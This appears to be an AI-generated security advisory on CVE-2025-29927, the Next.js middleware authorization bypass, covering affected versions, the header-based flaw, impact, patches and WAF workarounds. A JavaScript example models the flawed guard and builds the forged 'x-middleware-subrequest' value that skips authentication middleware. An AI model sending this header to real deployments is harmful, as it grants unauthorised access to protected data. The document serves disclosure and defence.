CVE-2025-29927
JavaScript vulnerability analysis and mitigation

Overview

Next.js, a React framework for building full-stack web applications, disclosed a critical authorization-bypass vulnerability (CVE-2025-29927) affecting releases from 11.1.4 up to, but not including, the patched versions 12.3.5, 13.5.9, 14.2.25 and 15.2.3. The issue was reported to Vercel on February 27, 2025, and publicly disclosed on March 21, 2025. It affects self-hosted Next.js applications that use middleware and run with 'next start' and 'output: standalone'; deployments hosted on Vercel, Netlify and Cloudflare Workers were reported as not affected (GitHub Advisory, Next.js Blog).

Technical details

Next.js sets an internal header, 'x-middleware-subrequest', on requests it issues to itself so that middleware does not re-run recursively and loop forever. Before the fix, the server trusted this header on any incoming request: if its value named the application's middleware module ('middleware' or 'src/middleware' on current releases, 'pages/_middleware' on very old ones), middleware was skipped entirely. Older releases skipped as soon as the name appeared in the colon-separated value; newer releases counted occurrences and skipped once the count reached the internal recursion limit of five, which an attacker satisfies by repeating the name five times. Because the header name and the possible module names are fixed and public, an unauthenticated client can add the header to an ordinary HTTP request and any authentication, authorization, redirect or header-hardening logic implemented in middleware never runs. The vulnerability has been assigned a CVSS v3.1 score of 9.1 (Critical) with the vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N: remotely exploitable without privileges or user interaction, with high confidentiality and integrity impact and no availability impact scored (JFrog Blog, GitHub Advisory).
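The guard described above, as an added example that is not Next.js source code: a model of the pre-patch recursion check in both of its generations, wired to a toy authentication middleware so the effect of a forged header is visible. The header name, the module names and the depth limit of five follow the public advisory and write-ups; every function name below, the toy middleware and the constructed requests are this example's own.

```javascript
// Added example, not Next.js source code: a model of the pre-patch
// middleware recursion guard that CVE-2025-29927 abuses, wired to a toy
// auth middleware so the effect of a forged header is visible. The header
// name, the module names and the depth limit follow the public advisory
// and write-ups; every function name here is this example's own.

const HEADER = 'x-middleware-subrequest';
const MAX_RECURSION_DEPTH = 5; // limit used by the newer form of the guard

// Pre-patch guard. Older releases skipped middleware as soon as its module
// name appeared in the colon-separated header value ("legacy"); later
// releases counted occurrences and skipped once the count reached the
// recursion limit. Returns true when middleware would NOT run.
function middlewareSkipped(headers, middlewareName, { legacy = false } = {}) {
  const raw = headers[HEADER];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  if (legacy) return subrequests.includes(middlewareName);
  const depth = subrequests.filter((name) => name === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// The header value that satisfies the guard for a given middleware module
// name (e.g. 'middleware', 'src/middleware', or 'pages/_middleware' on
// very old releases). Nothing secret is needed to produce it.
function bypassValue(middlewareName, { legacy = false } = {}) {
  return legacy
    ? middlewareName
    : Array(MAX_RECURSION_DEPTH).fill(middlewareName).join(':');
}

// Toy auth middleware of the kind the CVE bypasses: requests under /admin
// without a session cookie are redirected to /login.
function authMiddleware(req) {
  const cookie = req.headers.cookie || '';
  if (req.url.startsWith('/admin') && !cookie.includes('session=')) {
    return { status: 307, location: '/login' };
  }
  return null; // fall through to the route
}

// Toy server: run middleware unless the recursion guard says to skip it.
function handle(req, middlewareName = 'middleware', opts = {}) {
  if (!middlewareSkipped(req.headers, middlewareName, opts)) {
    const verdict = authMiddleware(req);
    if (verdict) return verdict;
  }
  return { status: 200, body: 'admin dashboard' };
}

// Constructed requests: the same anonymous GET /admin with and without the
// forged header (Node lowercases header names, so the key is lowercase).
const anonymous = { url: '/admin', headers: {} };
const forged = { url: '/admin', headers: { [HEADER]: bypassValue('middleware') } };

console.log('without header:', handle(anonymous)); // 307 -> /login
console.log('with header:   ', handle(forged));    // 200, middleware skipped
```

The depth-counting form is why a single 'middleware' value is not enough on recent releases while five colon-joined copies are; on a legacy guard the single value already suffices. A real server also has to guess the right module name, which is why the public write-ups try each candidate in turn.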

Impact

The vulnerability leads to authorization bypass in applications that rely on middleware for security checks. An attacker who supplies the header can skip authentication and authorization performed in middleware, reach protected routes and pages, and read or modify data behind them. Only the middleware layer is skipped: checks performed inside route handlers, API routes or server components still run, so applications that enforce authorization there as well are not fully exposed. Researchers also described scenarios in which skipping middleware enables cache poisoning or denial of service, for example where middleware is what sets caching or security headers or performs rewrites (Rapid7 Blog, JFrog Blog).

Mitigation and workarounds

The vulnerability has been patched in versions 12.3.5, 13.5.9, 14.2.25 and 15.2.3; upgrading is the only complete fix. If upgrading is not immediately possible, organizations can apply the advisory's workaround: prevent requests from external users that contain the x-middleware-subrequest header from reaching the Next.js application, by stripping or blocking the header in the reverse proxy or Web Application Firewall (WAF) in front of it. The match must be case-insensitive, since HTTP header names are. Cloudflare users can enable a managed WAF rule for protection. Because the header is not one a legitimate client ever sends, edge and application logs should also be reviewed for past requests that carried it (GitHub Advisory, JFrog Blog).

Community reactions

The vulnerability has garnered significant attention in the security community, with multiple security firms and researchers publishing detailed analyses. Next.js has acknowledged that while they published the CVE promptly, they 'missed the mark on partner communications' and are establishing a partner mailing list to improve future vulnerability communications (OSS Security).

Additional resources


Source: This report was generated using AI.
